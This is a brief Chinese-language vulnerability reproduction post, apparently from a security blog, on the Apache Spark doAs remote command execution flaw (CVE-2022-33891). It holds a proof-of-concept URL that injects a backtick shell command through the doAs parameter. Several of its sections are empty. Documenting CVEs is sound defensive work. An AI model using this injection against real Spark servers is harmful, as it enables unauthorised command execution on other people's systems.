Apache Spark doAs远程命令执行漏洞 #CVE-2022-33891

漏洞描述

Apache Spark 支持启动 ACL 来为 Web UI 访问提供身份验证,当 ACL 启动时可以通过构造特殊请求用户名导致 RCE。

漏洞影响



网络测绘

漏洞复现

主页面

d70ea0a9e6023822

验证POC

/jobs/?doAs=`touch /tmp/test.txt`

3e690d32b3023851

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容